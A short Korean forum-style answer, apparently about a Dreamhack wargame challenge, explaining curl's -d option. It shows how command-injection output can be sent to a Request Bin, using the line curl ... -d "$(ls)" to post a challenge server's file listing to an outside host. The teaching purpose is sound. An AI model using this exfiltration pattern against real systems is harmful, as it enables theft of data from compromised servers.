-d [DATA] 또는 --data [DATA] 옵션을 명시해주면, [DATA] 부분을 서버에 POST 메서드로 전송시키겠다는 것을 의미합니다.
해당 옵션을 활용하면 Command Injection 공격 시, 문제 서버의 데이터를 Request Bin에 전송시켜서 받아볼 수 있습니다.

활용법을 좀 더 자세하게 설명해 드리자면 다음과 같은 상황일 때,

• Command Injection으로 문제 서버상에서 아무 명령어나 실행시킬 수 있다.
• 내 Request Bin은 https://zdecuwo.request.dreamhack.games 이다.

아래 명령어를 문제 서버상에서 실행시키면,

curl https://zdecuwo.request.dreamhack.games -d "$(ls)"

문제 서버에서 ls 명령어를 친 결과가 Request Bin에 POST 메서드로 전송됩니다.
Request Bin에서는 자신에게 전송된 것들을 확인할 수 있기 때문에 문제 서버에 존재하는 파일이나 디렉토리를 확인할 수 있습니다.

"fizz=buzz"는 어느 곳에서 나오는 문구인지 알려주시면 확인해보겠습니다!